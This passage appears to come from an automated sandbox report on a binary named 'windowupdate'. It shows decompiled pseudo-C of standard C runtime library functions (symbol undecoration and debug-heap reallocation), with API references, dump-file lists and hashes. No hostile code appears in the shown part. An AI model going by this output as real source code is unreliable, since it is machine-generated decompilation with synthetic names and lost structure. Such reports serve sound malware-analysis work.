                      0x00d54dd6
                      0x00d54ddf
                      0x00d54de3
                      0x00d54de7
                      0x00d54df0
                      0x00d54df3
                      0x00000000
                      0x00000000
                      0x00d54d86
                      0x00d54d89
                      0x00d54d8c
                      0x00d54d90
                      0x00d54d93
                      0x00000000
                      0x00000000
                      0x00d54da9
                      0x00d54dac
                      0x00d54daf
                      0x00d54db3
                      0x00d54db6
                      0x00000000
                      0x00000000
                      0x00d54cfe
                      0x00d54cbb
                      0x00d54c44
                      0x00d54c47
                      0x00d54c56
                      0x00d54c62
                      0x00000000

                      APIs
                      • DName::operator+.LIBCMTD ref: 00D54C62
                        • Part of subcall function 00D4FC30: Mailbox.LIBCMTD ref: 00D4FC40
                        • Part of subcall function 00D4FC30: DName::operator+=.LIBCMTD ref: 00D4FC4C
                        • Part of subcall function 00D4FC30: Mailbox.LIBCMTD ref: 00D4FC58
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D54C72
                      • UnDecorator::doEcsu.LIBCMTD ref: 00D54C85
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D54CC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
                      • String ID: W$`unknown ecsu'$class $coclass $cointerface $enum $struct $union
                      • API String ID: 4208403871-962625158
                      • Opcode ID: 9ab19150234d236ea2ef6371566c6bd3b576d92e75a367076070955b3fa983b7
                      • Instruction ID: 37cc25e7fa887725b423d8235c5c9b6a6e1fe00441c3152c9d0015e6c8ea28cc
                      • Opcode Fuzzy Hash: 9ab19150234d236ea2ef6371566c6bd3b576d92e75a367076070955b3fa983b7
                      • Instruction Fuzzy Hash: 0A6120B5D40218DBDF14EFA4DC52AEEBBB4FF54305F14412AEC1666292EB305648CB72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D55060 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D55060(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _t51;
				intOrPtr _t61;
				char* _t63;
				intOrPtr _t66;
				intOrPtr _t81;
				intOrPtr* _t92;
				intOrPtr _t97;
				char* _t104;
				intOrPtr _t105;
				char* _t109;
				intOrPtr _t116;
				intOrPtr _t125;
				intOrPtr _t136;
				char* _t139;

				E00D4F3F0( &_v20);
				_t51 =  *0xf20640; // 0x0
				 *0xf20640 = _t51 + 1;
				_t92 =  *0xf20640; // 0x0
				_v8 =  *_t92;
				if(_v8 == 0x41) {
					L4:
					if(_a16 == 0) {
						if( *_a8 == 2 ||  *_a8 == 3) {
							 *_a8 = 5;
						} else {
							if( *_a8 == 1) {
								 *_a8 = 4;
							}
						}
					}
					_t125 =  *0xf20640; // 0x0
					 *0xf20640 = _t125 + 1;
					L29:
					E00D4F3F0(_a4);
					return _a4;
				}
				if(_v8 == 0x42) {
					if(_a16 == 0) {
						 *_a12 = 1;
						E00D4F850( &_v20, 0x3e);
						_t97 =  *0xf20640; // 0x0
						 *0xf20640 = _t97 + 1;
						goto L29;
					}
					E00D4F350(_a4, 2);
					return _a4;
				}
				if(_v8 == 0x43) {
					 *_a8 = 5;
					_t61 =  *0xf20640; // 0x0
					 *0xf20640 = _t61 + 1;
					goto L29;
				}
				_t63 =  *0xf20640; // 0x0
				if( *_t63 == 0) {
					L17:
					E00D4F350(_a4, 1);
					return _a4;
				} else {
					_t66 =  *0xf20640; // 0x0
					if( *((char*)(_t66 + (1 << 0))) != 0) {
						if(_a16 == 0) {
							_t104 =  *0xf20640; // 0x0
							_t105 =  *0xf20640; // 0x0
							_t28 =  *((char*)(_t105 + (1 << 0))) - 0x30; // -95
							_v12 = ( *_t104 - 0x30 << 4) + _t28;
							_t136 =  *0xf20640; // 0x0
							 *0xf20640 = _t136 + 2;
							if(_v12 > 1) {
								E00D4F850( &_v20, 0x2c);
								E00D4F820( &_v20, E00D4FB70( &_v20,  &_v36, E00D4F510(__ebx,  &_v28, __edi, __esi, _v12, 0)));
							}
							E00D4F820( &_v20, E00D4FBB0( &_v20,  &_v44, 0x3e));
							_t109 =  *0xf20640; // 0x0
							if( *_t109 != 0x24) {
								E00D4F820( &_v20, E00D4FBB0( &_v20,  &_v52, 0x5e));
							} else {
								_t81 =  *0xf20640; // 0x0
								 *0xf20640 = _t81 + 1;
							}
							_t139 =  *0xf20640; // 0x0
							if( *_t139 == 0) {
								E00D4FF10( &_v20, 1);
							} else {
								_t116 =  *0xf20640; // 0x0
								 *0xf20640 = _t116 + 1;
							}
							E00D5AAA0( &_v20);
							E00D4F240(_a4,  &_v20);
							return _a4;
						}
						E00D4F350(_a4, 2);
						return _a4;
					}
					goto L17;
				}
				goto L4;
			}
























                      0x00d55069
                      0x00d5506e
                      0x00d55076
                      0x00d5507b
                      0x00d55083
                      0x00d5508a
                      0x00d550a1
                      0x00d550a5
                      0x00d550ad
                      0x00d550ba
                      0x00d550c2
                      0x00d550c8
                      0x00d550cd
                      0x00d550cd
                      0x00d550c8
                      0x00d550ad
                      0x00d550d3
                      0x00d550dc
                      0x00d55293
                      0x00d55296
                      0x00000000
                      0x00d5529b
                      0x00d55090
                      0x00d550eb
                      0x00d55102
                      0x00d5510a
                      0x00d5510f
                      0x00d55118
                      0x00000000
                      0x00d55118
                      0x00d550f2
                      0x00000000
                      0x00d550f7
                      0x00d55096
                      0x00d55126
                      0x00d5512c
                      0x00d55134
                      0x00000000
                      0x00d55134
                      0x00d55146
                      0x00d55151
                      0x00d55168
                      0x00d5516d
                      0x00000000
                      0x00d55153
                      0x00d5515b
                      0x00d55166
                      0x00d5517e
                      0x00d5519a
                      0x00d551b2
                      0x00d551bc
                      0x00d551c0
                      0x00d551c3
                      0x00d551cc
                      0x00d551d6
                      0x00d551dd
                      0x00d55202
                      0x00d55202
                      0x00d55219
                      0x00d5521e
                      0x00d5522a
                      0x00d5524d
                      0x00d5522c
                      0x00d5522c
                      0x00d55234
                      0x00d55234
                      0x00d55252
                      0x00d5525d
                      0x00d55275
                      0x00d5525f
                      0x00d5525f
                      0x00d55268
                      0x00d55268
                      0x00d5527d
                      0x00d55289
                      0x00000000
                      0x00d5528e
                      0x00d55185
                      0x00000000
                      0x00d5518a
                      0x00000000
                      0x00d55166
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55069
                      • DName::DName.LIBVCRUNTIMED ref: 00D550F2
                      • DName::DName.LIBVCRUNTIMED ref: 00D5516D
                      • DName::DName.LIBVCRUNTIMED ref: 00D55185
                      • DName::DName.LIBVCRUNTIMED ref: 00D551EC
                        • Part of subcall function 00D4F510: __aullrem.LIBCMT ref: 00D4F557
                        • Part of subcall function 00D4F510: __aulldiv.LIBCMT ref: 00D4F570
                      • DName::operator+.LIBCMTD ref: 00D551F9
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB80
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB98
                      • Mailbox.LIBCMTD ref: 00D55202
                      • DName::operator+.LIBCMTD ref: 00D55210
                      • Mailbox.LIBCMTD ref: 00D55219
                      • DName::operator+.LIBCMTD ref: 00D55244
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBC0
                        • Part of subcall function 00D4FBB0: DName::operator+=.LIBCMTD ref: 00D4FBCD
                        • Part of subcall function 00D4FBB0: Mailbox.LIBCMTD ref: 00D4FBD9
                      • Mailbox.LIBCMTD ref: 00D5524D
                      • DName::operator+=.LIBCMTD ref: 00D55275
                        • Part of subcall function 00D4FF10: DName::isValid.LIBCMTD ref: 00D4FF1A
                        • Part of subcall function 00D4FF10: DName::isEmpty.LIBCMTD ref: 00D4FF26
                        • Part of subcall function 00D4FF10: DName::operator=.LIBVCRUNTIMED ref: 00D4FF42
                      • DName::setIsComArray.LIBCMTD ref: 00D5527D
                      • Mailbox.LIBCMTD ref: 00D55289
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D55296
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
                      • String ID: C
                      • API String ID: 961569035-1037565863
                      • Opcode ID: 7c634ea984aa10362437d32465375f78e20ce4d463890a2f190b614546666df9
                      • Instruction ID: 391c012d547bb86d1f01dc9e5161d7e1eb16386e20199d9101ae3ce00793784b
                      • Opcode Fuzzy Hash: 7c634ea984aa10362437d32465375f78e20ce4d463890a2f190b614546666df9
                      • Instruction Fuzzy Hash: D561BE71900519DBEF29CF54DCA1BBE7B71FF81305F144028EC065B2A6CB71AA45DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D525F0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 136COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D525F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr* _t53;
				void* _t57;
				void* _t75;
				intOrPtr _t86;
				intOrPtr* _t93;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t106;
				char _t108;

				_t53 =  *0xf20640; // 0x0
				_t85 =  *_t53;
				_v12 =  *_t53;
				if(_v12 == 0x58) {
					_t86 =  *0xf20640; // 0x0
					 *0xf20640 = _t86 + 1;
					_v60 = E00D50060("void", 4);
					_v56 = _t103;
					E00D4F1F0(_a4,  &_v60);
					return _a4;
				}
				_t122 = _v12 - 0x5a;
				if(_v12 == 0x5a) {
					L3:
					_t105 =  *0xf20640; // 0x0
					_t106 = _t105 + 1;
					 *0xf20640 = _t106;
					_t57 = E00D521D0(_t85);
					__eflags = _t57;
					if(_t57 == 0) {
						_v52 = E00D50060("<ellipsis>", 0xa);
						_v48 = _t106;
						_v16 =  &_v52;
					} else {
						_v44 = E00D50060("...", 3);
						_v40 = _t106;
						_v16 =  &_v44;
					}
					_v24 = _v16;
					E00D4F1F0(_a4, _v24);
					return _a4;
				}
				E00D524A0(__ebx, __edi, __esi, _t122,  &_v36);
				if(E00D5AB70( &_v36) != 0) {
					E00D4F240(_a4,  &_v36);
					return _a4;
				} else {
					_t93 =  *0xf20640; // 0x0
					_t108 =  *_t93;
					_v8 = _t108;
					if(_v8 == 0) {
						E00D4F240(_a4,  &_v36);
						return _a4;
					}
					if(_v8 == 0x40) {
						_t95 =  *0xf20640; // 0x0
						 *0xf20640 = _t95 + 1;
						E00D4F240(_a4,  &_v36);
						return _a4;
					}
					if(_v8 == 0x5a) {
						_t98 =  *0xf20640; // 0x0
						 *0xf20640 = _t98 + 1;
						_t75 = E00D521D0(_t98 + 1);
						__eflags = _t75;
						if(_t75 == 0) {
							_v76 = E00D50060(",<ellipsis>", 0xb);
							_v72 = _t108;
							_v20 =  &_v76;
						} else {
							_v68 = E00D50060(",...", 4);
							_v64 = _t108;
							_v20 =  &_v68;
						}
						_v28 = _v20;
						E00D4FB30( &_v36, _a4, _v28);
						return _a4;
					}
					E00D4F350(_a4, 2);
					return _a4;
				}
				goto L3;
			}































                      0x00d525f6
                      0x00d525fb
                      0x00d525fd
                      0x00d52604
                      0x00d5267b
                      0x00d52684
                      0x00d52699
                      0x00d5269c
                      0x00d526a6
                      0x00000000
                      0x00d526ab
                      0x00d52606
                      0x00d5260a
                      0x00d52611
                      0x00d52611
                      0x00d52617
                      0x00d5261a
                      0x00d52620
                      0x00d52625
                      0x00d52627
                      0x00d52655
                      0x00d52658
                      0x00d5265e
                      0x00d52629
                      0x00d52638
                      0x00d5263b
                      0x00d52641
                      0x00d52641
                      0x00d52664
                      0x00d5266e
                      0x00000000
                      0x00d52673
                      0x00d526b7
                      0x00d526c9
                      0x00d527ac
                      0x00000000
                      0x00d526cf
                      0x00d526cf
                      0x00d526d5
                      0x00d526d7
                      0x00d526de
                      0x00d526fc
                      0x00000000
                      0x00d52701
                      0x00d526e4
                      0x00d52774
                      0x00d5277d
                      0x00d5278a
                      0x00000000
                      0x00d5278f
                      0x00d526ee
                      0x00d52709
                      0x00d52712
                      0x00d52718
                      0x00d5271d
                      0x00d5271f
                      0x00d5274d
                      0x00d52750
                      0x00d52756
                      0x00d52721
                      0x00d52730
                      0x00d52733
                      0x00d52739
                      0x00d52739
                      0x00d5275c
                      0x00d5276a
                      0x00000000
                      0x00d5276f
                      0x00d52799
                      0x00000000
                      0x00d5279e
                      0x00000000

                      APIs
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00D52620
                      • UnDecorator::getArgumentList.LIBCMTD ref: 00D526B7
                        • Part of subcall function 00D524A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D524B0
                        • Part of subcall function 00D524A0: DName::operator+=.LIBCMTD ref: 00D524FC
                        • Part of subcall function 00D524A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D52561
                        • Part of subcall function 00D524A0: Replicator::isFull.LIBCMTD ref: 00D52587
                        • Part of subcall function 00D524A0: Replicator::operator+=.LIBCMTD ref: 00D5259A
                        • Part of subcall function 00D524A0: DName::operator=.LIBVCRUNTIMED ref: 00D525BB
                        • Part of subcall function 00D524A0: DName::operator+=.LIBCMTD ref: 00D525C7
                        • Part of subcall function 00D524A0: Mailbox.LIBCMTD ref: 00D525DA
                      • Mailbox.LIBCMTD ref: 00D526FC
                      • UnDecorator::doEllipsis.LIBCMTD ref: 00D52718
                      • DName::operator+.LIBCMTD ref: 00D5276A
                      • Mailbox.LIBCMTD ref: 00D5278A
                      • DName::DName.LIBVCRUNTIMED ref: 00D52799
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • Mailbox.LIBCMTD ref: 00D527AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$Z$Z$void
                      • API String ID: 3869916097-1416550716
                      • Opcode ID: d45f13f55c9d9c0bc7e816397d964a5c63721c476a3a3917f527838cb8d2e0dd
                      • Instruction ID: 5e8ba693350692b1228e4e4e5c572f08e51a513cbc66bd85687e745080fe87f5
                      • Opcode Fuzzy Hash: d45f13f55c9d9c0bc7e816397d964a5c63721c476a3a3917f527838cb8d2e0dd
                      • Instruction Fuzzy Hash: D9512DB5D00208EBDF14DF98D891AED7BB0BF49305F144059ED05A7252EB70AA4DDBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D87560 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 449COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E00D87560(void* __edi, intOrPtr _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
				signed int _v5;
				void* _v6;
				signed int* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _t131;
				signed char _t132;
				signed int _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int* _t141;
				intOrPtr _t142;
				intOrPtr _t145;
				signed int* _t153;
				signed int _t157;
				void* _t158;
				void* _t160;
				void* _t162;
				intOrPtr _t169;
				signed int _t171;
				signed int* _t176;
				void* _t180;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t191;
				void* _t192;
				signed int _t195;
				signed int _t197;
				void* _t198;
				void* _t200;
				signed int _t209;
				signed int _t213;
				signed int _t221;
				intOrPtr _t232;
				intOrPtr _t234;
				signed int* _t253;
				signed int _t257;
				signed int _t259;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				void* _t288;
				void* _t289;
				void* _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				void* _t295;

				_t288 = __edi;
				if(_a4 == 0) {
					return E00D89580( *_a8, _a12, _a16, _a20);
				}
				__eflags = _a24 & 0x000000ff;
				if((_a24 & 0x000000ff) == 0) {
					L5:
					L00D87AE0();
					_t131 =  *0xdf6058; // 0x34
					_v24 = _t131;
					__eflags =  *0xdf6060 - 0xffffffff;
					if( *0xdf6060 != 0xffffffff) {
						__eflags = _v24 -  *0xdf6060; // 0xffffffff
						if(__eflags == 0) {
							asm("int3");
						}
					}
					__eflags =  *0xdf6244;
					if( *0xdf6244 == 0) {
						L17:
						__eflags = _a12 - 1;
						if(_a12 == 1) {
							L27:
							_t132 = E00D87360(_t207, _a4);
							_t290 = _t289 + 4;
							__eflags = _t132 & 0x000000ff;
							if(__eflags == 0) {
								L31:
								_t135 = L00D880B0(_a4);
								_t291 = _t290 + 4;
								__eflags = _t135;
								if(__eflags == 0) {
									_t185 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x25c, 0, L"%ls", L"_CrtIsValidHeapPointer(block)");
									_t291 = _t291 + 0x18;
									__eflags = _t185 - 1;
									if(_t185 == 1) {
										asm("int3");
									}
								}
								_t136 = E00D86E40(_a4);
								_t292 = _t291 + 4;
								_v16 = _t136;
								_t137 = _v16;
								__eflags =  *((intOrPtr*)(_t137 + 0x10)) - 3;
								if( *((intOrPtr*)(_t137 + 0x10)) != 3) {
									_v6 = 0;
								} else {
									_v6 = 1;
								}
								_v5 = _v6;
								__eflags = _v5 & 0x000000ff;
								if((_v5 & 0x000000ff) == 0) {
									_t209 =  *0xf206ec; // 0x3329
									__eflags = _t209 -  *((intOrPtr*)(_v16 + 0x14));
									if(__eflags >= 0) {
										goto L47;
									}
									_t180 = L00D848E0(__eflags, 1, 0, 0, 0, "Error: possible heap corruption at or near 0x%p", _a4);
									__eflags = _t180 - 1;
									if(_t180 == 1) {
										asm("int3");
									}
									 *((intOrPtr*)(L00D82F70(_t209))) = 0x16;
									return 0;
								} else {
									__eflags =  *((intOrPtr*)(_v16 + 0xc)) - 0xfedcbabc;
									if(__eflags != 0) {
										L40:
										_t184 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x263, 0, L"%ls", L"old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks");
										_t292 = _t292 + 0x18;
										__eflags = _t184 - 1;
										if(_t184 == 1) {
											asm("int3");
										}
										L42:
										L47:
										_t210 = _a8;
										__eflags =  *_a8 - 0xffffffbc;
										if( *_a8 <= 0xffffffbc) {
											_v32 =  *_a8 + 0x24;
											_v12 = 0;
											_t211 = _a24 & 0x000000ff;
											__eflags = _a24 & 0x000000ff;
											if((_a24 & 0x000000ff) == 0) {
												_t141 = E00D9CA20(_v32, _v16, _v32);
												_t293 = _t292 + 8;
												_v12 = _t141;
												__eflags = _v12;
												if(_v12 != 0) {
													L55:
													_t142 =  *0xdf6058; // 0x34
													 *0xdf6058 = _t142 + 1;
													_t213 = _v5 & 0x000000ff;
													__eflags = _t213;
													if(_t213 == 0) {
														__eflags =  *0xf206ec - 0xffffffff;
														if( *0xf206ec < 0xffffffff) {
															_t171 =  *0xf206ec; // 0x3329
															 *0xf206ec = _t171 - _v12[5];
															__eflags = (_t213 | 0xffffffff) -  *0xf206ec -  *_a8;
															if((_t213 | 0xffffffff) -  *0xf206ec <=  *_a8) {
																_v36 = 0xffffffff;
															} else {
																_v36 =  *_a8;
															}
															_t275 =  *0xf206ec; // 0x3329
															_t276 = _t275 + _v36;
															__eflags = _t276;
															 *0xf206ec = _t276;
														}
														_t232 =  *0xf206f0; // 0x22e4
														 *0xf206f0 = _t232 - _v12[5];
														_t169 =  *0xf206f0; // 0x22e4
														 *0xf206f0 = _t169 +  *_a8;
														_t234 =  *0xf206f0; // 0x22e4
														__eflags = _t234 -  *0xf206f4; // 0x22e4
														if(__eflags > 0) {
															_t272 =  *0xf206f0; // 0x22e4
															 *0xf206f4 = _t272;
														}
													}
													_t145 = E00D86370(_v12);
													_t294 = _t293 + 4;
													_v20 = _t145;
													_t253 = _v12;
													__eflags =  *_a8 -  *((intOrPtr*)(_t253 + 0x14));
													if( *_a8 >  *((intOrPtr*)(_t253 + 0x14))) {
														__eflags = _v20 + _v12[5];
														E00D4AF80(_t288, _v20 + _v12[5], 0xcd,  *_a8 - _v12[5]);
														_t294 = _t294 + 0xc;
													}
													E00D4AF80(_t288, _v20 +  *_a8, 0xfd, 4);
													_t295 = _t294 + 0xc;
													__eflags = _v5 & 0x000000ff;
													if((_v5 & 0x000000ff) == 0) {
														_v12[2] = _a16;
														_v12[3] = _a20;
														_v12[6] = _v24;
													}
													_v12[5] =  *_a8;
													__eflags = _a24 & 0x000000ff;
													if((_a24 & 0x000000ff) != 0) {
														L72:
														__eflags = _v12 - _v16;
														if(_v12 == _v16) {
															L74:
															return _v20;
														}
														__eflags = _v5 & 0x000000ff;
														if((_v5 & 0x000000ff) == 0) {
															__eflags =  *_v12;
															if( *_v12 == 0) {
																_t257 =  *0xf206e8; // 0x106fb00
																__eflags = _t257 - _v16;
																if(__eflags != 0) {
																	_t160 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2c5, 0, L"%ls", L"__acrt_last_block == old_head");
																	_t295 = _t295 + 0x18;
																	__eflags = _t160 - 1;
																	if(_t160 == 1) {
																		asm("int3");
																	}
																}
																 *0xf206e8 = _v12[1];
															} else {
																 *( *_v12 + 4) = _v12[1];
															}
															_t153 = _v12;
															__eflags =  *(_t153 + 4);
															if( *(_t153 + 4) == 0) {
																_t259 =  *0xf206e4; // 0x1071fd0
																__eflags = _t259 - _v16;
																if(__eflags != 0) {
																	_t158 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2cf, 0, L"%ls", L"__acrt_first_block == old_head");
																	__eflags = _t158 - 1;
																	if(_t158 == 1) {
																		asm("int3");
																	}
																}
																 *0xf206e4 =  *_v12;
															} else {
																 *(_v12[1]) =  *_v12;
															}
															__eflags =  *0xf206e4;
															if( *0xf206e4 == 0) {
																 *0xf206e8 = _v12;
															} else {
																_t157 =  *0xf206e4; // 0x1071fd0
																 *((intOrPtr*)(_t157 + 4)) = _v12;
															}
															_t221 =  *0xf206e4; // 0x1071fd0
															 *_v12 = _t221;
															_v12[1] = 0;
															 *0xf206e4 = _v12;
															return _v20;
														}
														goto L74;
													} else {
														__eflags = _a24 & 0x000000ff;
														if(__eflags != 0) {
															L70:
															_t162 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\heap\\debug_heap.cpp", 0x2b8, 0, L"%ls", L"reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)");
															_t295 = _t295 + 0x18;
															__eflags = _t162 - 1;
															if(_t162 == 1) {
																asm("int3");
															}
															goto L72;
														}
														__eflags = _v12 - _v16;
														if(__eflags == 0) {
															goto L72;
														}
														goto L70;
													}
												}
												return 0;
											}
											_t176 = E00D99820(_t211, _v16, _v32);
											_t293 = _t292 + 8;
											_v12 = _t176;
											__eflags = _v12;
											if(_v12 != 0) {
												goto L55;
											}
											return 0;
										}
										 *((intOrPtr*)(L00D82F70(_t210))) = 0xc;
										return 0;
									}
									__eflags =  *(_v16 + 0x18);
									if(__eflags == 0) {
										goto L42;
									}
									goto L40;
								}
							}
							_t239 = _a4;
							_t186 = L00D848E0(__eflags, 1, 0, 0, 0, "The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()", _a4);
							__eflags = _t186 - 1;
							if(_t186 == 1) {
								asm("int3");
							}
							 *((intOrPtr*)(L00D82F70(_t239))) = 0x16;
							return 0;
						}
						__eflags = (_a12 & 0x0000ffff) - 4;
						if((_a12 & 0x0000ffff) == 4) {
							goto L27;
						}
						__eflags = (_a12 & 0x0000ffff) - 2;
						if((_a12 & 0x0000ffff) == 2) {
							goto L27;
						}
						__eflags = _a16;
						if(__eflags == 0) {
							_t191 = L00D848E0(__eflags, 1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
							_t290 = _t289 + 0x18;
							__eflags = _t191 - 1;
							if(_t191 == 1) {
								asm("int3");
							}
						} else {
							_push(_a20);
							_t192 = L00D848E0(__eflags, 1, 0, 0, 0, "Error: memory allocation: bad memory block type.\n\nMemory allocated at %hs(%d).\n", _a16);
							_t290 = _t289 + 0x1c;
							__eflags = _t192 - 1;
							if(_t192 == 1) {
								asm("int3");
							}
						}
						goto L31;
					}
					_t195 =  *0xdf6244; // 0xd9cb50
					_v28 = _t195;
					_t207 = _v28;
					 *0xdc62b0(2, _a4,  *_a8, _a12, _v24, _a16, _a20);
					_t197 = _v28();
					_t289 = _t289 + 0x1c;
					__eflags = _t197;
					if(_t197 != 0) {
						goto L17;
					}
					__eflags = _a16;
					if(__eflags == 0) {
						_t198 = L00D848E0(__eflags, 0, 0, 0, 0, "%s", "Client hook re-allocation failure.\n");
						__eflags = _t198 - 1;
						if(_t198 == 1) {
							asm("int3");
						}
						L16:
						return 0;
					}
					_push(_a20);
					_t200 = L00D848E0(__eflags, 0, 0, 0, 0, "Client hook re-allocation failure at file %hs line %d.\n", _a16);
					__eflags = _t200 - 1;
					if(_t200 == 1) {
						asm("int3");
					}
					goto L16;
				} else {
					__eflags =  *_a8;
					if(__eflags != 0) {
						goto L5;
					} else {
						L00D89480(__eflags, _a4, _a12);
						return 0;
					}
				}
			}

























































                      0x00d87560
                      0x00d8756c
                      0x00000000
                      0x00d87585
                      0x00d87591
                      0x00d87593
                      0x00d875b4
                      0x00d875b4
                      0x00d875b9
                      0x00d875be
                      0x00d875c1
                      0x00d875c8
                      0x00d875cd
                      0x00d875d3
                      0x00d875d5
                      0x00d875d5
                      0x00d875d3
                      0x00d875d6
                      0x00d875dd
                      0x00d8766c
